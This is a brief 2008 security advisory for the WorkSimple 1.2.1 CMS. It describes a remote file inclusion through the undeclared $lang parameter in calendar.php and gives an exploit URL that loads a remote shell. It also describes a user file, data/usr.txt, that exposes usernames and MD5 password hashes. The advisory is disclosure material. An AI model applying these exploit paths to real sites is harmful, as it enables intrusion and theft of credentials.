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WorkSimple 1.2.1 RFI / Data Disclosure

🗓️ 16 Dec 2008 00:00:00Reported by OsirysType 

WorkSimple 1.2.1 RFI / Data Disclosure. Vulnerabilities in WorkSimple 1.2.1 allow remote file inclusion and sensitive data disclosure, potentially leading to unauthorized access to sensitive information

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[0x01] Informations:  
Script : WorkSimple 1.2.1  
Download :  
Vulnerability : Remote File Inclusion / Sensitive Data Disclosure  
Author : Osirys  
Contact : osirys[at]live[dot]it  
Notes : Proud to be Italian  
Greets: : XaDoS, x0r, emgent, Jay  
[0x02] Bug:[Remote File Inclusion]  
Bugged file is: /[path]/calendar.php  
<?PHP require 'data/conf.php'; //Include the global config ?>  
<?php include("$lang") ?>  
$lang variable is not declared, I thought it was declared on conf.php, but it's not.  
So we can set the $lang value directly from GET.  
FIX : Just declare $lang, for example in /[path]/data/conf.php  
[!] EXPLOIT: /[path]/calendar.php?lang=[remote_txt_shell]  
[0x03] Bug:[Sensitive Data Disclosure]  
In this cms, when an user register himself, the cms puts informations like username and  
password on a .txt file. So, just going on it, we can get sensitive data like username  
and passoword. username:md5_hash  
[!] EXPLOIT: /[path]/data/usr.txt  

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